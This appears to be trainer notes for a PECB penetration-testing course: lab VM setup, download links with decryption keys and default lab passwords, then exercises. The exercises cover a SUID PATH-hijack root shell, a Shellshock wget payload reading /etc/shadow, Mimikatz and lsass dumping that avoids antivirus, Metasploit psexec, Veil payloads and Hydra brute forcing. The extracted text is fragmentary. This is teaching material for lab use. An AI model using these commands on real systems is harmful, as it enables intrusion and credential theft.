Professional Documents
Culture Documents
Trainer Notes
www.pecb.com
Symbols used across the document:...................................................................................3
www.pecb.com
2
Basic Nmap / SMB NSE Scripts...................................................................................................................................26
Enumeration of Users...................................................................................................................................................... 26
Enumeration of Shares................................................................................................................................................... 26
Brute forcing accounts................................................................................................................................................... 26
Basic Vulnerability checking........................................................................................................................................ 26
Sessions Enumerations................................................................................................................................................... 27
Enumeration of Users...................................................................................................................................................... 27
Advanced Enumerations...................................................................................................28
LDAP Enumeration using NMAP Scripts.................................................................................................................28
LDAP Brute Force (only for reference).................................................................................................................... 28
TRAINER CHECKS:............................................................................................................................................................ 30
Note for trainers:............................................................................................................................................................... 37
Tools
Code
CMD
URL/Website
Task/Exercise/Activity
VM – {name}
www.pecb.com
3
Running the Labs (Virtual Machines)
The labs are designed to be downloaded from online resources in the Internet and to
run offline in a classroom with at least a router/switch or Wi-Fi device with DHCP
enabled.
Where to Download
a) Course Materials (including software to run the Virtual Machines)
URL/Website https://mega.co.nz/#F!NwcQVYYB
(Decryption Key = “uVSuAlkt8T4mKYpHvwLu5Q” without the quotes)
URL/Website https://mega.co.nz/#F!ZksExZBC
(Decryption Key = “vuLLCcZUu4KZbY6zvTI_mg” without the quotes)
Sync URL
https://link.getsync.com/#f=LABS&sz=0&t=2&s=MK26ICHL7WA7I3PGULOKBFCKVSQ774NPIFHUN5
5MUUR5H7NUM3UQ&i=CMIXP3HKFAVTEQUMOYBWC7UKQL4CKPCQC&v=2.0
www.pecb.com
4
Software needed to run the Vms
All the below tools can be found within the Toolz Folder within the Course
Material links.
http://www.vmware.com/products/fusion/fusion-evaluation
I.e. after importing the VMs into VirtualBox check that the adapters are using your
current NAT Network Configuration or DHCP.
You may have to add a NAT Network Configuration (including the IP range)
www.pecb.com
5
LABs Configuration & Setup
In this scenario each Student manage their own NAT/network using either VirtualBox
or VMWare and configuring their services accordingly.
If the time distributing the Virtual Machines allows we recommend this configuration.
(Normally the LABs will be used within the second day of the course)
www.pecb.com
6
Configuration (b) – Trainer non-isolated environment.
In this scenario all VMs use a Bridged Network configuration in which the IPs are
obtained via a DHCP Router/WiFi and reachable to the students through the same
network segment.
This configuration will be easier to setup for the initial ‘discovery modules’ but harder
to maintain the further the students advance during the hacking activities, particularly
when assessing the Linux environment as they may start modifying (or even
rebooting) the system several times.
This configuration will allow the students to use the Kali Linux Virtual Machine as a
‘trampoline’ to assess the rest of the environment.
We recommend, though, using a Bridged network when working with the Web App
Virtual Machine so students can use their own laptops with graphical interfaces to run
the assessments.
Further Notes:
We believe the instructor will be familiar with the use of Virtual Machines, Routers,
Wi-Fi Configurations and IP addresses on multiple OS.
The larger VMs are the Windows Labs, which could be run within the Trainer’s laptop
at all times as most exercises revolve around network discoveries.
The configurations explained before are merely examples and a combination of them
could be used, including using students’ own material and laptops as to run the
exercises and labs more efficiently.
Please review the DNS configurations on the Windows Boxes (Windows 7 and
Windows 8.1) as to make sure they can access the Domain Controller on Windows
2008 R2 Server.
The following screenshots show how to verify the connectivity with the Domain
Controller and Active Directory server.
www.pecb.com
7
Figure 4 - Domain Controller IP Address
www.pecb.com
8
Figure 6 - Checking if the Domain Users name are valid
www.pecb.com
9
Labs – Virtual Machines
Windows VM’s
PECB-win7.sys.lab / Windows 7 Pro – Admin/P@ssw0rd!!
PECB-DC.sys.lab / Windows Server 2008 - Administrator/P@ssw0rd!!
PECB-Win8.sys.lab / Windows 8.1 – Admin/P@ssw0rd!!
(Check keyboard configuration if you are having trouble entering the passwords)
Windows Boxes should have a folder with Mimikatz and other tools on it.
www.pecb.com
10
Figure 8 -Toolz Folder on user Admin
To allow Mimikatz to pull a user’s password from memory, make sure you access
some windows (shared) resources before using it.
I.e: Open \\pebc-dc with Windows Explorer and login with syslab\jack.russell
The debug privilege allows someone to debug a process that they wouldn’t otherwise
have access to. For example, a process running as a user with the debug privilege
enabled on its token can debug a service running as local system.
More from: http://msdn.microsoft.com/library/windows/hardware/ff541528.aspx
mimikatz # privilege::debug
www.pecb.com
11
Privilege '20' OK
Remark: ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
means that the required privilege is not held by the client (mostly you're not an
administrator )
Pass the Hash Further information (optional reading & exploit modules)
https://www.kali.org/penetration-testing/passing-hash-remote-desktop/
https://github.com/gentilkiwi/mimikatz/wiki/module-%7E-sekurlsa#pth
https://www.youtube.com/watch?feature=player_embedded&v=x-bIZRU-eLM
http://tools.kali.org/password-attacks/keimpx
https://www.nsa.gov/ia/_files/app/Reducing_the_Effectiveness_of_Pass-the-Hash.pdf
www.pecb.com
12
Linux Lab & VM
msfadmin/password are the credentials to login.
Root password is ‘Qazwsx12+1!’
Webserver for exploiting the Shellshock vulnerability is set to start automatically.
Vulnerable SETUID root file (bedrock) sits in msfadmin home directory
msfadmin@linuxbox:nano ls
msfadmin@linuxbox:chmod 755 ls
Next the PATH variable would need to be changed:
msfadmin@linuxbox:Export PATH=“.”
Running the ‘bedrock’ executable now would create a SETUID root shell in /tmp
msfadmin@linuxbox:./bedrock
To test if we can execute commands as root try the following
msfadmin@linuxbox:/sbin/poweroff
poweroff: Need to be root
Now execute the SUID Shell and run the Poweroff command again ;)
msfadmin@linuxbox:./sh
#sbin/poweroff
www.pecb.com
13
a) Find sgid or suid files using the following:
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
b) Look at binary to see if you can figure out what it does:
c) run strings on the binary
d) run strace (specifically strace –qfeexecve ./bedrock (to see what other
programs it calls)
e) look at permissions of other programs
f) if system binaries are called, look at how they are called and if you can
change PATH variable to exploit them
g) change PATH to "." and drop in custom "ls" file containing the following
/bin/cp /bin/sh /tmp/sh
/bin/chown root /tmp/sh
/bin/chmod 6555 /tmp/sh
suid root shell needs to be called 'sh' or run with '-p' param to get past bash
protection (drops root privileges on shells when run with suid)
SHELLSHOCK exploit:
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo;
/bin/cat /etc/shadow" http://127.0.0.1/cgi-bin/test.cgi
Apache user www-data was added to shadow group to be able to read shadow file
More information on the VM and the other Web Apps installed on it can be found at
https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
www.pecb.com
14
If you want to download a fresh/vainilla VM for these exercises please follow this link:
http://sourceforge.net/projects/owaspbwa/files/
www.pecb.com
15
Figure 10 - Access to all Web Apps within the Virtual Machine
www.pecb.com
16
Figure 11 - Web Application chosen for the course
www.pecb.com
17
If you need to delete the history for other students to use the VM, please type the
following command
If the SSH service shows a minus sign (-) it means that it is not ‘running’
b) Now we need load the default SSH run level by issuing the following command:
root@kali~:# update-rc.d -f ssh defaults
You can create login banner, also known as a Message of the Day (MOTD) banner
on Kali Linux that is displayed when users login.
Just edit the /etc/motd file (restart ssh after you have completed the edit).
Edit the following file and add your text.
root@kali:~# vi /etc/motd
root@kali:~# service ssh restart
________________________________________
\______ \_ _____/\_ ___ \______ \
| ___/| __)_ / \ \/| | _/
| | | \\ \___| | \
|____| /_______ / \______ /______ /
\/ \/ \/
-----------------------------------------------------------------
Warning: This system is restricted to private use
authorized users for business purposes only. Unauthorized access
or use is a violation of company policy and the law. This system
may be monitored for administrative and security reasons. By
proceeding, you acknowledge that (1) you have read and understand
this notice and (2) you consent to the system monitoring.
-----------------------------------------------------------------
www.pecb.com
19
How to create a new normal user with sudo permission in Kali Linux
Open a terminal and issue the following command.
root@kali:~# useradd -m <username>
The option -a means to add and '-G sudo' means to add the user to the sudo group.
If you want to know more about the usermod command, issue #man usermod
command to know more about usermod
Now we have to specify the shell for our new user.
root@kali:~# chsh -s /bin/bash <username>
www.pecb.com
20
Exercises & Tools
Symbols:
Tools
Code
CMD
URL/Website
Task/Exercise/Activity
VM – {name}
DNS
Slide: Domain Name System (DNS) – Basics
$ host -t ns pecb.org
pecb.org name server ns3.dreamhost.com.
pecb.org name server ns1.dreamhost.com.
pecb.org name server ns2.dreamhost.com.
Nmap:
dns-blacklist
Checks target IP addresses against multiple DNS anti-spam and open proxy
blacklists and returns a list of services for which an IP has been flagged. Checks may
be limited by service category (eg: SPAM, PROXY) or to a specific service name.
dns-brute
Attempts to enumerate DNS hostnames by brute force guessing of common
subdomains. With the dns-brute.srv argument, dns-brute will also try to enumerate
common DNS SRV records.
dns-cache-snoop
Performs DNS cache snooping against a DNS server.
dns-check-zone
Checks DNS zone configuration against best practices, including RFC 1912. The
configuration checks are divided into categories which each have a number of
different tests.
dns-client-subnet-scan
Performs a domain lookup using the edns-client-subnet option which allows clients to
specify the subnet that queries supposedly originate from. The script uses this option
to supply a number of geographically distributed locations in an attempt to enumerate
as many different address records as possible. The script also supports requests
using a given subnet.
dns-fuzz
Launches a DNS fuzzing attack against DNS servers.
dns-ip6-arpa-scan
Performs a quick reverse DNS lookup of an IPv6 network using a technique which
analyzes DNS server response codes to dramatically reduce the number of queries
needed to enumerate large networks.
dns-nsec-enum
Enumerates DNS names using the DNSSEC NSEC-walking technique.
dns-nsec3-enum
Tries to enumerate domain names from the DNS server that supports DNSSEC
NSEC3 records.
dns-nsid
Retrieves information from a DNS nameserver by requesting its nameserver ID (nsid)
and asking for its id.server and version.bind values. This script performs the same
queries as the following two dig commands: - dig CH TXT bind.version @target - dig
+nsid CH TXT id.server @target
www.pecb.com
22
dns-random-srcport
Checks a DNS server for the predictable-port recursion vulnerability. Predictable
source ports can make a DNS server vulnerable to cache poisoning attacks (see
CVE-2008-1447).
dns-random-txid
Checks a DNS server for the predictable-TXID DNS recursion vulnerability.
Predictable TXID values can make a DNS server vulnerable to cache poisoning
attacks (see CVE-2008-1447).
dns-recursion
Checks if a DNS server allows queries for third-party names. It is expected that
recursion will be enabled on your own internal nameservers.
dns-service-discovery
Attempts to discover target hosts' services using the DNS Service Discovery
protocol.
dns-srv-enum
Enumerates various common service (SRV) records for a given domain name. The
service records contain the hostname, port and priority of servers for a given service.
The following services are enumerated by the script: - Active Directory Global
Catalog - Exchange Autodiscovery - Kerberos KDC Service - Kerberos Passwd
Change Service - LDAP Servers - SIP Servers - XMPP S2S - XMPP C2S
dns-update
Attempts to perform a dynamic DNS update without authentication.
dns-zeustracker
Checks if the target IP range is part of a Zeus botnet by querying ZTDNS @
abuse.ch. Please review the following information before you start to scan:
https://zeustracker.abuse.ch/ztdns.php
dns-zone-transfer
Requests a zone transfer (AXFR) from a DNS server.
www.pecb.com
23
Basic Windows Port Scanning / Windows Service mapping
Basic Port mapping against a full Active Directory (Domain Controller) Windows
Server & Windows 8 host
TCPDump
http://www.tcpdump.org
tcpdump -nnvv -i eth0 'tcp[tcp-syn] & (tcp-syn)' != 0 and not port 22 and host
172.16.204.143
specific source host tcpdump ‘src host <ipaddress>’ tcpdump ‘src host 10.10.10.1’
specific destination tcpdump ‘dst host <ipaddress>’ tcpdump ‘dst host 10.10.10.1’
host
specific source network tcpdump ‘src net <network address>’ tcpdump ‘src net 10.10.10.0’
specific destination tcpdump ‘dst net <network address>’ tcpdump ‘dst net 10.10.10.0’
network
www.pecb.com
24
specific source port tcpdump ‘src port <port-number>’ tcpdump ‘src port 21’
specific destination tcpdump ‘dst port <port-number>’ tcpdump ‘dst port 21’
port
specific host for the tcpdump ‘host <ipaddress> and port tcpdump ‘host 10.10.10.1 and
particular port <port-number>’ port 21’
the specific host for tcpdump ‘host <ipaddress> and port tcpdump ‘host 10.10.10.1 and
all the ports except not <port-number>’ port not 22’
SSH
specific port of a tcpdump interface <interface> ‘port tcpdump interface eth1 ‘port
particular interface <port-number>’ 21’
Wireshark
https://www.wireshark.org
This script performs the same queries as the following two dig commands:
- dig CH TXT bind.version @target
- dig +nsid CH TXT id.server @target
Example
www.pecb.com
25
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
Enumeration of Users
nmap --script smb-enum-users.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139
root@kali:/# enum4linux -U -o -u "user" -p "password" <host>
Enumeration of Shares
nmap --script smb-enum-shares.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139 <host>
root@kali:/# enum4linux -S -o <host>
www.pecb.com
26
Basic Vulnerability checking
nmap --script smb-check-vulns.nse -p445 <host>
sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 <host>
Sessions Enumerations
nmap --script smb-enum-sessions.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-sessions.nse -p U:137,T:139 <host>
(Requires any access higher than anonymous; guests, users, or administrators are
all able to perform this request on Windows 2000, XP, 2003, and Vista.)
Finding open shares is useful to a penetration tester because there may be private
files shared, or, if it's writable, it could be a good place to drop a Trojan or to infect a
file that's already there. Knowing where the share is could make those kinds of tests
more useful, except that determining where the share is requires administrative
privileges already.
Enumeration of Users
From a pen-testers perspective, retrieving the list of users on any given server
creates endless possibilities.
Full information regarding these two enumeration techniques can be found here:
http://nmap.org/nsedoc/scripts/smb-enum-users.html
Tools that pioneering some of the techniques used by this script goes to enum.exe,
sid2user.exe, and user2sid.exe programs which illustrated SID/RID walking techniques
plus added insight of how Microsoft Windows handled Null Sessions in the past
www.pecb.com
27
allowing anonymous users to make calls to functions such as QueryDisplayInfo which
returns a detailed list of users, along with descriptions, types, and full names.
This type of enumeration was also used to determine whether users have recently
changed their passwords or date of last update, blocked their accounts or even if
they have never logged in into the system etc.
Useful information for a Pen Tester (and attackers) to target certain accounts to start
password guessing or password brute forcing attacks.
Further Reading
http://www.sans.org/reading-room/whitepapers/testing/scanning-windows-deeper-
nmap-scanning-engine-33138
Advanced Enumerations
www.pecb.com
28
Activity / Apply enumeration techniques learnt with Windows
boxes against *nix systems
(Optional - Create two accounts trivially bruteforceable on the Linux box)
Hydra example
hydra -l msfadmin -P /usr/share/wordlists/metasploit/unix_passwords.txt -t
6 ssh://172.16.204.142
http://portswigger.net/burp/download.html
http://portswigger.net/burp/burpsuite_free_v1.6.jar
http://www.telerik.com/fiddler
www.pecb.com
29
The idea of these basic exercises will be to setup BURP proxy as to identify these
common vulnerabilities in a Vulnerable Web Site.
If there is Internet access – Students can also work over the following URL
https://google-gruyere.appspot.com/start
TRAINER CHECKS:
Open these web apps and familiarise with the examples and exploits.
If network and time allows show a full exploitation of a xss bug by stealing someone
credentials.
The Duration of this activity should take no longer than 30minutes. It usually takes
time for non-experience web app testers to setup the required environment.
XSS and SQLi vulnerabilities can be identified, even without specific tools and by
observing the web app behaviour and client side source code inspection.
www.pecb.com
30
Windows 8 Pen Test attack scenarios :
a) Bruteforce password for the domain account john.smith (that’s Local Admin)
on the Windows 8 system using Metasploit’s SMB login checker module
www.pecb.com
31
[payloads$]
comment = Payloads
path = /root/veil-output/compiled
browseable = yes
read only = yes
guest ok = yes
public = yes
root@kali:~# msfconsole
www.pecb.com
32
RHOSTS => 10.0.2.7
msf auxiliary(psexec_command) > set SMBPass P@ssw0rd!!
SMBPass => P@ssw0rd!!
msf auxiliary(psexec_command) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(psexec_command) > exploit
www.pecb.com
33
Figure 14 - Using Veil Framework on Kali Linux
To install Veil Framework on a fresh Kali Linux type: apt-get install veil
a) Bruteforce password for the domain account john.smith (that’s Local Admin)
on the Windows 8 system using Metasploit’s SMB login checker module
www.pecb.com
34
2. Copy PSExec and Procdump over to the target machine using the credentials
just discovered. Use mount (*nix) or net use (Windows) to mount the folder and then
copy the files over.
*Nix: mount -t cifs //target/C$ /mnt/target –o
username=adminuser,password=password,domain=targetdomain
Windows: net use e: \\target\C$ password /user:domain\adminuser
3. Login to the system using Terminal Services and get a command shell. The
user john.smith is a local admin, however to get a process dump of the lsass.exe
process a SYSTEM user is required. The following command should be used to get a
SYSTEM shell:
Psexec –i –s –d cmd
www.pecb.com
35
4. Run the following procdump command to dump the lsass.exe process
memory. Using this method, no ‘hacking tools’ are uploaded to the target machine
avoiding triggering AV:
5. Copy the output dump file back over the mount point created in step 2, and
launch Mimikatz locally. Remember to have the same architecture (x86 or x64) as
the system the process dump came from. Use the following commands within
Mimikatz to get cleartext passwords from the process dump:
www.pecb.com
36
6. This should reveal the password of a domain admin account that can then be
used to login to the DC and gain control over it
If you need to activate the local Administrator account on Windows 8.1 (It comes
deactivated by Default on fresh installs) type the following
www.pecb.com
37